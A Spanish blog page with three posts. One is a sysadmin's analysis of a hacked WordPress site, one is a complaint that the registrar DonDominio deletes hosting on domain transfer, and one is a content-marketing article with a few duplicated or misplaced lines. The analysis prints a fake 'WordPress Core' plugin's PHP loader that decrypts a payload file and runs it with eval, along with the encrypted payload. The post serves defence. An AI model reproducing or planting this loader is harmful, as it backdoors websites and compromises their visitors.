BLOG SEOXAN
Mantente al dia sobre las últimas tendencias en marketing digital y seguridad informática
Categorias
Últimas entradas en el blog
Artículo sobre la Infección en WordPress
Fecha: 2024-06-15 17:03:08Autor: Alex Rubio
Como administrador de sistemas, a veces uno se encuentra en situaciones en las que es complicado saber cómo y por qué se ha sufrido una infección. Esto se debe principalmente a la presencia de sitios web que no han sido creados por nosotros y que, a menudo, incorporan "sorpresas" no muy agradables. En este caso, y como en la mayoría de los casos, se trata de un WordPress, donde la falta de instalación o actualización de los plugins ha permitido a los hackers acceder al sistema.
El hecho de que cualquiera pueda instalar plugins de WordPress es muy democrático, pero tiene sus desventajas. No todos los creadores de plugins son buenos programadores y, diariamente, se descubren plugins vulnerables. Los usuarios o clientes de la web no suelen entender que un sitio web parece estar "vivo" y que no es fácil mantenerlo libre de código mal hecho o de creadores que han dejado de dar soporte. El mundo gratuito democratiza, pero complica la seguridad, ya que no hay que confundir el voluntarismo con el profesionalismo.
Así pues, este es uno de los casos que me he encontrado. El hecho de que los hackers puedan subir archivos a la estructura de WordPress hace que nos encontremos con archivos php.ini como este:
Archivos .htaccess modificados o insertados en innumerables directorios para otorgar permisos de ejecución a programas que no deberían tenerlos, como este comando en .htaccess:
DirectoryIndex index.php index.html index.htm
El comando DirectoryIndex en el archivo .htaccess especifica qué archivos debe buscar el servidor web cuando se accede a un directorio sin especificar un archivo concreto. En este caso, la línea:
indica al servidor que, al acceder a un directorio, debe buscar primero un archivo llamado index.php. Si no encuentra ese archivo, buscará uno llamado index.html. Si tampoco encuentra ese, buscará index.htm. Este orden de búsqueda permite a los administradores del sitio web controlar qué archivo se muestra por defecto cuando se accede a un directorio.
También es fácil encontrar plugins que, aparentemente, tienen nombres rimbombantes y lógicos, usando la ingeniería social para no llamar la atención. Hoy me he encontrado con uno de esos casos. ¿Quién dudaría de un plugin llamado "WordpressCore" o de uno llamado "google-seo-rank"? ¡Ay, Dios mío! ¡Alma de cántaro! ¿Quién te iba a decir que las cosas serían así...?
Estos plugins, además de asegurarse el control de la web para siempre, engañan a los usuarios mediante una llamada externa a un JavaScript, haciendo aparecer un mensaje de que tienen un problema con el navegador. Por supuesto, cada vez están mejor diseñados. Luego, hacen que los usuarios ejecuten un comando con privilegios de administrador para infectar sus máquinas. Aquí tienes un ejemplo de uno de esos encantadores scripts:
https://cdn.ethers.io/lib/ethers-5.2.umd.min.js
Medidas de Mitigación
Para mitigar esta amenaza:
- Eliminar los Archivos Maliciosos: Inmediatamente eliminar los archivos
php.ini,.htaccess,include.php, los archivos.txtsospechosos y el plugingoogle-seo-rankasi como el WoprdpressCore - Revisar Configuraciones de PHP: Asegurarse de deshabilitar funciones peligrosas y restringir el acceso a directorios.
- Actualizar Plugins y Temas: Mantener todos los plugins y temas actualizados.
- Monitoreo y Auditoría: Implementar soluciones para detectar cambios no autorizados.
- Escaneo de Malware: Utilizar herramientas de escaneo de malware para identificar y eliminar código malicioso.
Ejemplo de ficheros .txt con contenido malicioso:
R9ir+PJYkX98tjPI4LYFFw==
kvEf4UKzNsfWCXAgWVMZZuM1wklOwQ61oz0zp7HLWoNgyJ6xXBcfPj/VunrYkI088/T+ybU68Q0dmS0utVONQiFouBH/mjfkv6ClxqMUdJiCaN2khi5sbuHmGYeQF46QIU/UKYBzNH0gDXw10Q340SV40a6kpLvSqtEYG6jX6DalY+nI4pQ1jaSdDlV7yC7oYsVsSeZR7zapMNU8vf9VYi1/E0ph3BPDNaE0NEhWhF0DDN4eVN0lZUTox7uv+IZMZicVj+GnecYDNMUOLkRqFCgmhZZdZ4/3JYf6Yqy6xDwjzGialvwnxvxOeJuuCJ4Y4re7NZEoTVTSKY1eahbr+BOc9JB9GrAPI+oBladyxY5/C34FkyOkq1LdN0OfqjLq+LAf8onH491bXR0nQ0eBxUaIFIP8u1Y0b2WQIO2ayV6zcnCOrUF0kKLT3Vn2FB9mUqjRtg3ukY8gadTCEqNnT+5hpIILi0qhWAzMjs1FyI+HA1HR2hUf+Tm+IT818/DREH6ugnJcxwJARRQNetpYN3KO+EJcll2kbRtpIROgSb1HjdtUVIR0O12U/yjhI3IQLPQT7fcXQkDM+JzY/CfY4ljJSgRsRFmI626v9Vxz8qWWjUoqbvBDDTpl8DiCC/F/qua6tkHzVqan5dho7AH7hVdJPcn74ncQKi4SbDdY2VA/epSjdFi2zrXI8KrD0HbJsmhL76Jh"
Que despues es decodificado mediante codigo php como este:
/**
* @package Wordpress_Core
* @version 1.7.3
*/
/*
Plugin Name: WordPress Core
Plugin URI: https://wordpress.org/plugins/
Description: This is core plugin for managment WordPress.
Version: 1.7.3
Author URI: https://wordpress.org/
*/
class UnsafeCrypto
{
const METHOD = "aes-256-ctr";
public static function decrypt($message, $nonce, $key, $encoded = false)
{
if ($encoded) {
$message = base64_decode($message, true);
$nonce = base64_decode($nonce, true);
if ($message === false || $nonce === false) {
throw new Exception('Encryption failure');
}
}
$plaintext = openssl_decrypt(
$message,
self::METHOD,
$key,
OPENSSL_RAW_DATA,
$nonce
);
return $plaintext;
}
}
$key = hex2bin('af64a08c9cf0b2070726e52e2fb78f02a9615726758db69ad8d9de140806707c');
$parts = file('./vwbulbzhnj.txt', FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES);
$decrypted = UnsafeCrypto::decrypt($parts[1], $parts[0], $key, true);
eval($decrypted);
Mi experiencia y opinion con DonDominio
Fecha: 2024-06-14 06:52:45Autor: Alex Rubio
En los últimos meses, tuve una experiencia realmente decepcionante con la empresa de registro de dominios y hosting web, DonDominio. Lo que descubrí a través de este proceso es algo que considero crucial compartir, ya que puede afectar directamente a cualquier cliente actual o potencial de esta empresa.
El Problema con la transferencia de dominios
En primer lugar, es importante entender cómo funciona el servicio de DonDominio. Cuando pagas por un dominio en DonDominio, este dominio está intrínsecamente ligado al hosting que también puedes contratar con ellos. Esto puede parecer conveniente a primera vista, pero hay una trampa significativa que no es muy conocida y que puede tener consecuencias graves.
Si decides trasladar tu dominio a otro proveedor, debes estar al tanto de que el hosting asociado con DonDominio, incluso si está pagado por completo, se eliminará automáticamente junto con todos sus datos. Esto incluye no solo la página web, sino también todos los servicios adicionales contratados, como el correo electrónico.
La experiencia de un cliente
Uno de mis clientes recientemente experimentó este problema de primera mano. Tenía tanto el dominio como el hosting con DonDominio y decidió transferir su dominio a otro proveedor sin saber que esta acción resultaría en la eliminación de su página web y todos los correos electrónicos asociados. La pérdida de datos fue descomunal y el impacto negativo sobre su negocio fue inmediato. Toda la información y los correos importantes almacenados en su servidor se perdieron sin previo aviso ni posibilidad de recuperación.
La respuesta de DonDominio
Al contactar con DonDominio para intentar resolver el problema, nos indicaron que la solución era crear un ticket en su página web. Según su respuesta, enviarían un correo electrónico con una copia de seguridad de todos los datos para poder ser restaurados. Aunque esta solución podría parecer adecuada, presenta un grave inconveniente: si no tienes una cuenta de correo electrónico fuera del dominio afectado, te encuentras en un bucle sin salida. No puedes recibir el correo con la copia de seguridad porque tu cuenta de correo también fue eliminada.
¿Por qué es importante?
Este problema es de una magnitud considerable y la falta de información clara y accesible sobre esta política de DonDominio es preocupante. Los clientes deberían ser informados explícitamente de que la transferencia de un dominio resultará en la eliminación de su hosting y todos los datos asociados.
Asi pues, es vital que cualquier persona que esté considerando contratar servicios de dominio y hosting con DonDominio entienda esta política. La falta de transparencia en este aspecto puede llevar a pérdidas significativas de datos y servicios, algo que sucedió a mi cliente y que espero no le ocurra a nadie más. Asegúrate de tener copias de seguridad actualizadas y una cuenta de correo alternativa antes de realizar una transferencia de dominio. La experiencia de mi cliente con DonDominio ha sido una lección costosa y espero que este artículo sirva como advertencia para otros.
En resumen, asegúrate de estar bien informado y preparado antes de hacer cambios en tus servicios de dominio y hosting. La información y la precaución pueden ahorrarte muchos problemas en el futuro.
Cómo puede ayudar el marketing de contenidos al crecimiento de tu negocio online
Fecha: 2024-06-06 09:12:02Autor: Abel J. Turpin
El marketing de contenidos es una de las técnicas de marketing más utilizadas en todo el mundo para el crecimiento empresarial. Según los informes, alrededor del 70% de los vendedores y empresas B2C utilizan el marketing de contenidos. Consiste en crear y publicar constantemente contenidos relevantes y valiosos para satisfacer las necesidades del público objetivo.
Sin embargo, si usted no sabe sobre el potencial del marketing de contenidos en llevar un negocio en línea a nuevas alturas, entonces este artículo es para usted.
En esta entrada de blog, hablaremos de las múltiples formas a través de las cuales el marketing de contenidos puede hacer crecer una marca en Internet.
Formas en que el marketing de contenidos puede contribuir al crecimiento empresarial
Hay varias maneras a través de las cuales el marketing de contenidos puede resultar en el crecimiento del negocio en línea, algunos de los principales son los siguientes:
Los tres mejores detectores de plagio de IA en 2024:
Entonces, después de considerar el hecho de que los verificadores de plagios de IA son realmente mejores en la detección de plagio, hemos encontrado los tres principales detectores de plagio de IA que discutiremos uno por uno a continuación:
1. Aumentar la notoriedad de la marca
Para que las empresas crezcan en Internet, es fundamental que su marca sea conocida. Permite a las empresas ser reconocidas rápidamente en el mercado por el público objetivo. El marketing de contenidos puede ayudar mucho a una marca a aumentar su notoriedad.
En crear contenido relevante, valioso e informativo que eduque al público potencial en todos los aspectos posibles, tendrá la oportunidad de mostrar los aspectos positivos de su empresa, como las prioridades, los valores y mucho más.
Todo esto también ayudará a captar la atención de un público que nunca ha estado familiarizado con la marca. La atención de un público más amplio será un claro indicio de una mayor notoriedad.
2. Crear confianza y lealtad
Ganar clientes y fidelizarlos es esencial para el crecimiento de una empresa. Esto no solo se traduce en un máximo de ventas, sino que también actúa como una herramienta de marketing gratuita, ya que los clientes fieles recomendarán la empresa a sus amigos, familiares, etc.
Esto significa que conseguirá nuevos clientes, lo que le ayudará en gran medida a seguir siendo competitivo en el mercado al que se dirige. Afortunadamente, el marketing de contenidos también ayuda a generar confianza y fidelidad.
Cuando una empresa crea contenidos que se ajustan perfectamente a las necesidades, preferencias y puntos débiles de su público objetivo, es más probable que éste piense que usted (la marca) se preocupa por él. del público objetivo, lo más probable es que piensen que usted (la marca) es quien se preocupa por ellos, lo que les permitirá ganarse su confianza y fidelidad.
3. Mejorar la visibilidad en las SERP
Una empresa sólo puede crecer en Internet si aparece en las primeras páginas de resultados de los motores de búsqueda (SERP). Esto se debe a que los clientes o usuarios suelen interactuar con los primeros resultados de búsqueda en función de su consulta.
¿Adivina qué? Puedes conseguir visibilidad en las SERP creando contenido de m marketing, sigue leyendo para saber cómo.
Esto se debe a que Google prioriza el contenido de alta calidad que se crea simplemente para satisfacer las necesidades y preferencias de la audiencia.
Por último, el marketing de contenidos también puede generar clientes potenciales. Al interactuar con el contenido de marketing, hay muchas posibilidades de que el público potencial empiece a interesarse por los servicios o productos que se le ofrecen. público empiece a interesarse en los servicios o productos que se les ofrecen. Este es un claro indicio de generación de leads.
Obviamente, una generación máxima de clientes potenciales también aumentará las posibilidades generales de conseguir un máximo de ventas.
Estas son algunas de las principales formas en que el marketing de contenidos puede contribuir al crecimiento de un negocio en línea.
Cómo puede hacer marketing de contenidos para su negocio en línea
A continuación hemos discutido el procedimiento de cómo se puede hacer de manera eficiente la comercialización de contenidos para su negocio para llevarlo a nuevas alturas.
1. Determinar la audiencia y los objetivos
En primer lugar, hay que determinar el público al que se dirigirán los contenidos. Esto implica comprender sus necesidades, preferencias puntos de dolor, edad, región, sexo, etc. Todo esto ayudará a decidir qué tipo de contenido les gustará.
Existen múltiples formas de determinar las necesidades de la audiencia;
● Estudios de mercado.
● Análisis de la competencia.
● Comprador persona.
Además de comprender a la audiencia, también hay que decidir qué tipo de objetivos se quieren alcanzar con el marketing de contenidos. Los objetivos pueden ser crear identidad, aumentar las ventas etc. Decidir los objetivos te permitirá diseñar la estrategia de marketing en consecuencia.
2. Seleccionar formato de contenido
Lo siguiente es seleccionar el tipo o formato del contenido. Como empresa, tendrá opciones como:
● Crear entradas de blog.
● Correos electrónicos.
● Boletines informativos/libros electrónicos.
● Podcasts.
Para el crecimiento en línea, las entradas de blog suelen ser el formato preferido para la mayoría de las empresas de todo el mundo.
2. Seleccionar formato de contenido
La clave del éxito en el marketing de contenidos reside en los contenidos de valor. El contenido de valor proporciona información útil sobre los temas o problemas a los que se enfrenta el público objetivo.
Para crear contenidos de valor, una marca debe realizar una investigación en profundidad sobre el tema para recopilar todos los detalles esenciales, estadísticas, ejemplos, etc. sobre el mismo y, a continuación, iniciar el proceso de redacción.
Sin embargo, lo más importante es asegurarse de que el contenido creado sea fácil de entender para la audiencia. Así que, al escribir, utilice palabras y frases sencillas para describir la información, y siga una estructura de frases simple.
Sin embargo, si su contenido sigue careciendo de claridad, en lugar de volver a dedicar tiempo y esfuerzo a modificarlo, sería bueno reescribirlo a través de una herramienta en línea. La reescritura sustituirá eficazmente todas las palabras técnicas por sinónimos fáciles manteniendo inalterado el significado original. Para demostrarlo, echa un vistazo a la siguiente imagen:
La herramienta que utilizamos: https://www.paraphrasing.io/es/article-rewriter
4. La concisión es crucial
Por lo general, nadie prefiere leer largos contenidos de marketing en este mundo tan acelerado. En su lugar, quieren soluciones concisas a sus problemas. Por este motivo, usted también debe hacer todo lo posible para que el contenido de marketing sea lo más breve posible.
Para ello, evite utilizar palabras, frases o incluso detalles innecesarios o adicionales. En su lugar, cíñase al tema principal. Sin embargo, asegúrese de no comprometer la calidad del contenido y el significado original y la originalidad.
Este requisito puede dificultarle la tarea de resumir el marketing. Pero no se preocupe, también hay una solución eficaz disponible que es un - resumidor de texto. La herramienta trabaja para acortar rápidamente el texto de entrada mediante la eliminación de todos los detalles innecesarios sin dañar el original y la calidad. A continuación se adjunta una imagen para su referencia.
La herramienta que utilizamos: https://www.summarizer.org/es/resumidor-de-textos
5. Add a touch of Visuals
La inserción de elementos visuales (imágenes, vídeos, tablas, gráficos, etc.) en su contenido de marketing no sólo lo hará atractivo a la vista, sino que también animará a los lectores a dedicarle más tiempo.
Sin embargo, hay varias cosas que debe tener en cuenta al añadir elementos visuales. Por ejemplo, debe asegurarse de que el elemento visual añadido sea completamente relevante, único y que proporcione información a la audiencia.
Además, no añada demasiadas imágenes o vídeos, ya que esto hará que el contenido resulte poco profesional o espeluznante.
Por último, sería estupendo que también optimizara los elementos visuales para SEO. El proceso incluirá añadir texto Alt a las imágenes, comprimir el tamaño total de fotos y vídeos, etc.
6. Corregir antes de publicar
Antes de publicar contenidos de marketing en línea, es fundamental corregirlos para detectar cualquier tipo de problema gramatical.
Sin embargo, el problema es que, al corregir manualmente el contenido, existe la posibilidad de que su ojo cometa accidentalmente algunos errores, especialmente de puntuación. Por este motivo, los profesionales del marketing siempre han considerado aconsejable recurrir a un corrector gramatical.
La herramienta escaneará el texto en busca de todo tipo de errores y los subrayará una vez finalizado el escaneo. Además, le proporcionará sugerencias útiles para que pueda corregir los errores rápidamente. Para una mejor comprensión, eche un vistazo a la captura de pantalla adjunta a continuación.
La herramienta que utilizamos: https://www.correctorcastellano.net/
Conclusión
Sin duda, el marketing de contenidos puede ayudar a su negocio en línea a crecer mejorando su notoriedad de marca, generando confianza y fidelidad, generando clientes potenciales y mucho más. En este artículo, hemos explicado todos estos aspectos en detalle. Además de esto, también hemos discutido cómo se puede aprovechar de manera eficiente el marketing de contenidos para su marca.